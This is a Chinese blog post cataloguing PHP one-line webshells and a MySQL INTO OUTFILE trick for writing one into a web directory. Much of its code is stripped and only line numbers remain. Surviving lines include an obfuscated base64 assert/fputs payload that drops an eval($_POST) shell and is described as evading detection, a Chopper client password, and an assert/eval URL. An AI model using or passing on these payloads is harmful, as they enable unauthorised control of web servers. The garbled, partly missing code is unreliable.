PHP一句话木马小总结与SQL语句写一句话木马
发布日期:2021-05-09 05:28:04
浏览次数:6
分类:博客文章
本文共 683 字,大约阅读时间需要 2 分钟。
一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:
1 2
相信一目了然可以看懂如何使用这类一句话。
如果有疑问可以看我的博客
二、编码的替换的类型:
1 2 //会生成 3 4 5 //php在html内部的一种嵌入方式 6 7 8 9 10
三、乱七八糟类型的:
1 2 //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};3 //菜刀连接 躲避检测 密码c 4 5 //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 c 四、下载类型的:
1 2 3 //显示某文件4 5 //运行远程shell
五、无关键函数类型:
1 7 8 http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass 9 10
六、补充知识点:
SQL写一句话(MySQL)
1 select " " into outfile "/home/webaccount/projectname/www/*.php"2 #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
发表评论
最新留言
关注你微信了!
[***.104.42.241]2025年04月17日 11时29分41秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
数据泵使用NETWORK_LINK不落地导入数据
2021-05-09
实验之-----------修改oracle实例名
2021-05-09
控制文件
2021-05-09
Oracle text组件安装
2021-05-09
ConcurrentHashMap 源码分析
2021-05-09
在不影响程序使用的情况下添加shellcode
2021-05-09
刷LeetCode的简易姿势
2021-05-09
test!
2021-05-09
从零开始实现放置游戏(十五)——实现战斗挂机(6)在线打怪练级
2021-05-09
JavaScript 构造树形结构的一种高效算法
2021-05-09
通过Attached Property给控件绑定Command(二)
2021-05-09
Linq使用心得——SelectMany替代二重foreach循环
2021-05-09
UWP开发入门(二)——RelativePanel
2021-05-09
UWP开发入门(三)——{x:Bind}扩展标记
2021-05-09
微信小程序开发技巧总结 (一)-- 数据传递和存储
2021-05-09
Mac M1原生(ARM64)Golang dev&debug
2021-05-09
dock基本使用
2021-05-09
细说ASP.NET Core与OWIN的关系
2021-05-09
查看.NET Core源代码通过Autofac实现依赖注入到Controller属性
2021-05-09
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 459937946 位访客